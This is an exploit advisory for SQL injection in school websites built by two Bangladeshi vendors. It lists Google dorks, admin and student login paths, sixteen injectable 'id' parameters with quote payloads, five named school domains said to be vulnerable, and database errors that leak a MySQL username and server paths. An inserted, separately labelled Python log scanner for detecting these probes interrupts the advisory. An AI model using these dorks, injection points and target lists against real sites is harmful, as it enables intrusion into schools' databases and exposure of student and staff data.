Soft IT Security Hululu IT Bangladesh SQL Injection Vulnerability

Author: KingSkrupellos, Published: 11-01-2019
###############################################################

# Exploit Title : Soft IT Security Hululu IT Bangladesh SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 08/01/2019
# Vendor Homepage : softitsecurity.com ~ hululuit.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Google Dorks : intext:''© Copyright 2019. Designed and Developed by Soft IT Security'' site:edu.bd
intext:''© Copyright 2019. Designed and Developed by Hululu IT'' site:edu.bd
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# Cyberizm Exploit Reference Link : cyberizm.org/cyberizm-soft-it-security-hululu-it-bangladesh-sql-injection.html

###############################################################

Admin/Teacher/Student Panel Login Path =>

/adminoperation/
/teacheroperation/
/studentoperation/

# SQL Injection Exploits :
**********************

/?v=home.jsp&id=[SQL Injection]

/?v=administrationdeatils.jsp&id=[SQL Injection]

/?v=allteacher.jsp&id=[SQL Injection]

/?v=allclark.jsp&id=[SQL Injection]

/?v=talentstudent-detail.jsp&id=[SQL Injection]

/?v=allstudent.jsp&id=[SQL Injection]

/?v=boardresultdetails.jsp&id=1%27

/?v=universitydetails.jsp&id=[SQL Injection]

/?v=talentteacher-detail.jsp&id=[SQL Injection]

/?v=academiccalender-details.jsp&id=[SQL Injection]

/?v=allevent.jsp&id=[SQL Injection]

/?v=allresult.jsp&id=[SQL Injection]

/?v=noticebord-detail.jsp&id=[SQL Injection]

/?v=uploadbook-details.jsp&id=[SQL Injection]

/?v=usefulllinkdetails.jsp&id=[SQL Injection]

/?v=checkclass.jsp&id=[SQL Injection]
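
Added example, not part of the original advisory and not the vendor's code: a defender-side check that scans web access logs for requests to the `?v=<page>.jsp&id=` routes listed above whose `id` is not a plain integer. The combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a combined-format access log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_id(target):
    """Return the URL-decoded id if the request hits a ?v=<page>.jsp route
    with an id that is not a plain decimal integer; otherwise None."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    views = query.get("v", [])
    if not any(v.lower().endswith(".jsp") for v in views):
        return None  # not one of the routes this advisory covers
    for value in query.get("id", []):
        if not re.fullmatch(r"\d{1,10}", value):
            return value
    return None

def scan(lines):
    """Return (client, view, decoded_id) for every flagged log line."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = match.group(1)
        value = suspicious_id(target)
        if value is not None:
            client = line.split(" ", 1)[0]
            view = parse_qs(urlsplit(target).query)["v"][0]
            findings.append((client, view, value))
    return findings

# Constructed sample lines (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Jan/2019:10:00:01 +0600] "GET /?v=allteacher.jsp&id=4 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [08/Jan/2019:10:00:05 +0600] "GET /?v=administrationdeatils.jsp&id=3%27 HTTP/1.1" 200 612',
    '198.51.100.7 - - [08/Jan/2019:10:00:09 +0600] "GET /?v=boardresultdetails.jsp&id=1%27 HTTP/1.1" 200 598',
    '192.0.2.10 - - [08/Jan/2019:10:00:12 +0600] "GET /css/site.css HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for client, view, value in scan(SAMPLE_LOG):
        print(f"{client} {view} id={value!r}")
```

The same digits-only rule belongs in the application itself, applied to `id` before it reaches a parameterized query (mysqli or PDO, as the deprecation warning below recommends).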

###############################################################

# Example Vulnerable Sites =>
***************************

Note : (192.185.94.62) => There are 182 domains hosted on this server.

[+] birgardusafiaalimmadrasah.edu.bd/?v=administrationdeatils.jsp&id=3%27

[+] haripuralimmadrasha.edu.bd/?v=administrationdeatils.jsp&id=3%27

[+] tislamunionhighschool.edu.bd/?v=administrationdeatils.jsp&id=3%27

[+] haripurwomenscollege.edu.bd/?v=administrationdeatils.jsp&id=3%27

[+] jamunhndm.edu.bd/?v=administrationdeatils.jsp&id=3%27

###############################################################

# SQL Database Error :
*********************

Deprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/birgardusafiaali/public_html/DAL/DbConnect.php on line 8

Warning: mysql_connect(): Access denied for user 'birgardu_school'@'localhost' (using password: YES) in /home/birgardusafiaali/public_html/DAL/DbConnect.php on line 8

Warning: fread(): Length parameter must be greater than 0 in /home/haripuralimmadra/public_html/controller/function.php on line 220

###############################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

###############################################################